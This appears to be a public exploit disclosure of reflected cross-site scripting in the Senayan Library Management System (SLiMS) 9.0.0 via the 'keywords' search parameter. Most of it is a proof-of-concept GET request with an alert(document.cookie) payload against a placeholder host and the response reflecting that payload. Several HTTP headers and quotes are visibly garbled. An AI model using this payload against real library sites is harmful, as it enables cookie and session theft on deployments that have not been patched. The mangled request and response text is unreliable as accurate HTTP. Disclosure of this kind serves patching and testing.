## Title: Senayan Library Management System (v9.0.0) a.k.a. SLIMS 9
Multiple XSS-Reflected vulnerabilities
## Author: nu11secur1ty
## Date: 12.09.2022
## Vendor: https://slims.web.id/web/
## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0
## Description:
Copy the keyword request parameter value into the value
An HTML tag attribute that is enclosed in double quotations
marks.
The payload m8vzl”>alert(hello_vulnerability)hidhc
It was entered in the keyword parameter.
The application responded unmodified to this input.
## STATUS: HIGH Vulnerability
[+] Payload:
“`GET
GET /slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl”>alert(document.cookie)hidhc
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107
Safari/537.36
Connectivity: Close
Cache-Control: max-age=0
Cookie: SenayanMember=aoujjbpmorr1km0t1j9g5cnhju
Upgrade-Insecure-Requests: 1
Referer: http://pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=wd4iuxeo08r8d72ubgugx0nc5fylp2k6o9l4h6ywn
Sec-CH-UA: “.Not/A)Brand”;v=”99″, “Google Chrome”;v=”107″, “Chromium”;v=”107″
Sec-CHUA-Platform for Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
“`
[+] Response:
“`HTTP/1
HTTP/1.1 200 OK
Date: Fri, 09 Dec 2022 06:23:20 GMT
Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30
SAMEORIGIN X-Frame Options
X-Powered-By: PHP/7.4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Connectivity: Close
Content-Type: text/html; charset=UTF-8
Content-Length: 29492
<!–
# ===============================
# Classic SLiMS template
# ===============================
# @Author: Waris Agung Widodo
# @Email: [email protected]
# @Date: 2018-01-23T11:25:57+07:00
# @Last modified by: Waris Agung Widodo
# @Last modified time: 2019-01-03T11:25:57+07:00
–>
Senayan
<meta name="viewport" content="width=device-width,
initial-scale=1, shrink-to-fit=no”>
<meta http-equiv="Cache-Control" content="no-store, no-cache,
must-revalidate, post-check=0, pre-check=0″/>
<meta name="description" content="Open Source Library
Management System | Senayan”>
<meta name="viewport" content="width=device-width,
height=device-height, initial-scale=1″>
Meta property=”og.title” content=”Open Source Library Management
System | Senayan”/>
<meta property="og:description" content="Open Source Library
“Management System”/>
<meta property="og:url"
content=”//pwnedhost.com/slims9_bulian-9.0.0/index.php?search=search&keywords=m8vzl”>alert(document.cookie)hidhc”/>
“`
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0)
## Evidence and Exploit
[href](https://streamable.com/ac60v3)
## Time spent
`01:00:00`
